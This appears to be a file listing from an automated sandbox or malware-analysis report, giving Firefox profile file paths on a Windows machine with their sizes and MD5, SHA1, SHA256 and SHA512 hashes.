SHA5125a7a40e16df5cc9cb5c0cf7e4cdd59899d1813f5a6961cd998c967e96c3e7baeca36232a4f3db2142f6d87df2d5299372f79e70b0b2ae5ceb9031e9406d1b940
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\pending_pings\f78c39ac-f480-49c9-9913-00b5c0f975e5
Filesize671B
MD5f27a66ef22859656c6def2f8bcdb6b13
SHA17838be6019e29f41b4f83f5c1517f672ab3b2186
SHA256434b0c0a792f73d019451825c483d6bbf8f4d5ab99f8089f46831b45f0b31363
SHA512b3371e6764883c4ae761947378a5079509941373e47798721f862a5bb25c97e53559bdc25bd3895ee6d0d143bade8ce5c524d0b0e78135e1eddc3252e3958aa0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
14KB
MD58b64fdd782fbda54bc14e448536a8895
SHA15a2b4db7e30662c1c7f0a807d666e75480c32c80
SHA256c123c192a0db1595bbcdc9299e25af79e04d694cd1a94b19d8f4718e3814b60a
SHA5127f29551fdbea47518883b3f0bd6f1db345dd54890a6a0a9273ce9f11b104d6703d772f46c7925ced19c1fb504087d6f6e970a46771b6cdceb93d7b1b71c05dd9
-
Filesize
11KB
MD5bd2a5936e3938aee2725bcdf45ecc8b7
SHA1d5c9bded80f5aa57e990bbe8159166d9da7f17af
SHA256ee00e20864234ed0c0be48f9946b3a161368b374d2712720e40b64605b4f6306
SHA512126c8f29de04f886db11239cb52dcc653791e76417965932b85a039ca00c4fc0cc1ffdc9f59a5b5c2166be58817146b524aac386b5ae513dc3ae10a2e1e7fbbf
-
Filesize
10KB
MD5bc8b7514a503f048c24474652110e5f5
SHA128804a62648a60a2a9170062eacdc16698e3bb25
SHA256f9eedf53b694e2b485dbd81af62d0bfdf3d5e5bda8b55c31f56d7be9903ea3bb
SHA512b34dc93ab2f080a3ede09cb80a4a9e7e85e140382aaceeafc03064c147ebae569b10d6d762d4d4f931d20277d5524cc0d5e04412bb1e84151e9671b026ce87ae
-
Filesize
11KB
MD554bbbd5c9d3911e6ce748a6dc074d854
SHA1f531b9aaa03382570569be92b84f289080a3f4c9
SHA256fa2ee9eb5e596e86e5d4eb48f428487a66f917bc815d8b540d48e9d292187386
SHA512df1e29a980cc86e9aa08c23eb38d1551ad6bea51dc3b39a4cd9043350cc584d12457a7d20e15e3ac577b0491219d5a08bf4edfeb4211fe63d3bfeb95aa7fbf33
-
Filesize
9KB
MD5b66217961400abedd7cb6a08cec09ad5
SHA1381e6dc60ecd7f75551edbb36415349f0fbdd153
SHA2565b123e40e3f16279b3ed730cdd94456c63c29ef15506a08662b515373e8b3edd
SHA512dce3b93cd65403b54abec9597456d91231e178ee9fa4036008d06198698ffe74c67984a23eef1e6d927a9e9558f66e6f9e760a20f064d6506c69014163ddf854
-
Filesize
9KB
MD5c294a9b2eba6998f6629169fd28d3afb
SHA1cb74122d25893cf2d0d6e1b15c49f361ce4a831d
SHA2569472a2461c9269d7b1b9f1d8a1d7bc5993ea7ad9a3ce2c027ca106a849285cc9
SHA512ab7816f159f03597c89955f4a0bf18fe802bf046663917e8aeaf14f3aa067cee97aa54c9b71bd946bedf9d157b08a0e39031a30ba705b6ac2067cd8cac7320dd
-
Filesize
10KB
MD585b27a92c23a13617b74aae8b60549d5
SHA10ad4b6588ee2671f23c78d389d6ed5baa527f524
SHA256e2b71e4c1b5bb7fb9bbb0712d9b3a6895574e51b1cc63389dfbb5a32d90ab299
SHA5129f0d50b6f08571cddc3391953a72172070c1c391953f4e4faa28fb1aca431faff1aeebf14bc02b88f9e69bb62a7ed3a6c91b16d408eb2852157e0aa5aa45a8f7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD57f70e9b9fe92261454af7d81cb545964
SHA14d8d4d38ea59684a75e6d553bee947dda7ee7135
SHA2562b1074a906af684873af64e7e33c5dcf6e85f46bb4e0abc85deee1b3f3ab75d7
SHA5120ad71eed591a7a4c931e7b59927535a8be7acd575d339e2f0004df8185aa6972e50bc4e5a6ce162a4ac6553da31c958f40a160ef9c68b6e38c535d6ba1fb5520
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD5903e376321851194a29d2f95605b3e36
SHA116920f96622351d9467da80b69b0419c2114b659
SHA256a9fffed6fb504c4d6b823db6eaea6e5ff0af2d800e322262dd7dbe38ba475a52
SHA5129ee198b3b99ecaca6a64e2778cca5456f4961d06e34eb7c9ecea76bde08d1372582dcf08782c5acb7b95bb69fee1d8a24816d162883634e0aca162176d575b96
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\sessionstore-backups\recovery.baklz4
Filesize2KB
MD5cc4c9a12101371d0066037eba5572fe0
SHA17bf11621f9a84b842e0f3f478893ccc453111341
SHA2567618df967ee8aa32374862afc65bd2d74c7ef62110383667ebb80bd58a8eee2c
SHA512c0ce2ebda67bd0a2b04d4ef7f028ed136f134fee8a10321b72929cc810fdb1a7ae5b99e111f096686c327c976e39ae2db453fe61afba63bb98540a2bbb438458
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\sessionstore-backups\recovery.baklz4
Filesize2KB
MD58e6acc1aeedaacea13b4dcaadf8679de
SHA1a27836514902b51e84975852602760d0ffec8edb
SHA25621274aba9537d0efd22137f7f3ce8afb68d17f2de9fa6aba71531288105efc7f
SHA51241ee212991c712adf739ce07f32a31a2ade013e6d8df354c80ea92bc31b4e554adfeb165909d9af58b6e821220529a61fb665cea9543baf9aa4dbb740a40e60b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\sessionstore-backups\recovery.baklz4
Filesize2KB
MD5c59432a279e4cb43c8b84f0664f908eb
SHA130403fe50dfc3bf46920ef18d70e5ae4d4a6ea3e
SHA2569c8812097808bdd354c598bec09d1c55c90cb5530016440404115600618895f8
SHA512ed177901acfc6e2d39ae06d54999bb4b8a0fc1e8007ce452a39fe685f49270b8b81c06a8a937d8fd728cb1b1f58df4b6578ea4dec6f6723b04e12d85da11560a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize5.6MB
MD54aa4eec31e624db1ea98463a929efa80
SHA14749fb1ef3c7c7345d8e8b837ff8416b07d29d5e
SHA25690099aedad451eaf6c008001f85085964cc69725c428aabef659216e8d203b0f
SHA5122ca58ab0cb4ccb8ce1a584b0a86c308f1b0b0e14f9a99e7443651be38a5a974cb1529c493110cc8c1ada42171b37ba01f9ba4738cca50a057de1004bd03dd757
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize5.6MB
MD5b06cea7f936ca508a33aff885ee16abc
SHA196683e73295929c516dee2fc2a431cd6d9653584
SHA256eda0661c9fab0897d460709c54a50b575de8f236c92e6734c3470c4298f13c4c
SHA512447083248aaa6a64f8eddd88d5330b364538c5dd2eea6cbaf550556b564a5e5a3cf45a7840bd5901609d30baeeb416e54e0cbd2af278cf18319e82b66725cc95
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize9.3MB
MD5593566fa95ec47bb136c1e8509361eba
SHA1ac9cf432271806d0a23f84e4d0a9d824e6e06689
SHA256142e82b8864aaaef8800f20df7c209f9410d7a91464e55af7aaa515e6d387b1e
SHA51257d5b8e8b8939a10697f60e88d19cce33c05a78b13fae62aac66e243e6914c75b6d2f940e47e000ff60f2642d91f1ec40f4fa180e8293b052f2024f9823dcfe5
-
Filesize
33.5MB
MD544a687ff5f4954f86d0a911cec843437
SHA1c0379b53e62c3aa490435ebec901442cf637d0e7
SHA256873b3f4e9bcdf5c69e3928012df2b4d5fb94cb964f89ba842bdeb575178e031b
SHA5129b352b9ba5c0daec9dde3d73d1c13188e19af6590b15f66fcde0337dd1e7a4b8f14913239b1706c057cd0aad91c7b67c8396fb7d28012fb28b13e21585a703a8
-
Filesize
6.1MB
MD573c7cc676ab19d426f2745ef261d6349
SHA1f217a78eb2beddcbf5bb00c229a96f9ffaa98a0d
SHA2564a513270a4d7e85bdc8dfe9adea3b190cfc055e562060c2be9389336333864a0
SHA51240f69adef5b8de42283ff0539cf0f0259ed9d23baa4e87c63e594fe12ca7f35e73dc3a0d6a66dd13a584d0e1569940026bc49d41f95a1f23c0c3fd810613ad36
-
Filesize
12.5MB
MD50ba40688b6a23948b2bd929dd2777a59
SHA1bc109471bb84c7dc05ee6b1b63eae36c0e6ab209
SHA2564e3eca4adbe0c4fede28228239dd93bb866ecd0415569ede6464d796e8d1a3a8
SHA512104b2e48779d9e1f534ceb546f911e535eda1b2645f494313df661aceca41c134d3a10b3e97a00ddf4a40556421369fff3872e466357743bc21ea19e0b0c2156
-
Filesize
116KB
MD5ba5cf8079fa68d90a2e6497d3c5711c1
SHA166b3c641ccd9a04ebf35ea868548bf58de295a11
SHA256ae22254e2b5c5557f35a170696d53e847018221dcd4cc70c153c36ecdd891f81
SHA5128537604678bed001aca037d94c80d8d1dd3da3d5bf806fa687f44a093cb07a316dcef084b572b4fd9b3cd2d93fedc7db66a817b27f395a772f3b844509c30156
-
Filesize
134KB
MD5f2e401ec1c85ba69b28cca6e814afe3c
SHA19d7d78e98fae9c22a2ff4a938672c3fe37589738
SHA256b9b868f703ccb61ec15d14dcc738c4a4eebcc59c2f827090e7ced2f91c9debd7
SHA512605f0fa4d301519b07bb542ec215e9fa1d7426129c1b8a8de56e5418c3e64867d1f54ece273ff070b8ca4c5bf39dbdebbdddd83d6be6e701bb160b95b4597be1
-
Filesize
49KB
MD5b388b7f74802614467a17854b4bf75ff
SHA10ec7a95503e27ee4735e0c4a7051125ece957ab1
SHA256da4996a4d6b9e18c3ebce85b5fbd5666950e69e5d0e31afa2eef550c2671bd93
SHA5127c45a583cacf798b36fc6241397536ecb2eb9a846531fa8906c5c93e0680151ab9cf448bfb5a229c38fac8d4b83cdb044f05b95bada5a047e4acbcbc64c4d0d8
-
Filesize
74KB
MD5d31259e39bc2690a34448601e0bf105f
SHA1e5339404e51f56cc0349b250adb7e61dd4b22476
SHA256c94f3302b33c45a35ba83448c111dd0138a49d6355c943af0ea40bc8014a991b
SHA51279261bf57bc098d9c0e5f3cfa6acc2c353bc830fc7ae7201e13f3de54e4e584e5b1b5dfb4193818863cd36759b9c07d431b09f6ac74f6765827c4a2d47115541
-
Filesize
675KB
MD55eb3264c300a0a0a45f22305cff49596
SHA106ef49a2d145dc98dbd5eea42b1de53b7039b5c4
SHA2569aa4d1356beedaad8f8879b49b76d1ff120dec210a1c0135ede8b9337ad0505d
SHA512a2735a950d3505a7c835e78ed245cbdbff3821d5c9c4ac24b933ee143eab9b95d55ab6cff3bba16229f372077d7cfe2aac9785149ab70e742ed177872cde6ba0
-
Filesize
197KB
MD5ee63a5f831a47c40b38534b078742e53
SHA1e8320fd97b77e717255ad3732d2c677de77405bd
SHA25628f086ae4965dd262e000783a4fd8aebdce8eeeef8285db59984144e7a4c45d4
SHA5127b051a6957723bf1413e6ccb29c688d10eb7f87553cdf5bc8d876ed3f3b6cd5e9bcbeabb151acb36e483587aafaf5ce43d80e2995153b3bcfc14ac9ef3e38726
-
Filesize
88KB
MD514fdb628e0b51f26a7bc3f59ec6e33f2
SHA105deb1793e0a51fd79de99b6738a93cc959522fd
SHA2560fba4f6adcecbf2082ce52ebd6e7f07f7959b02ae401828aa640154933de40fe
SHA51228fd35174a70636c367c85116a268dc178546d6f6e632b82b7bd164877555057d31eeec76e1be91e82ce02ce04b6a33f704022d2b31a7066d4b6cb70cd798d90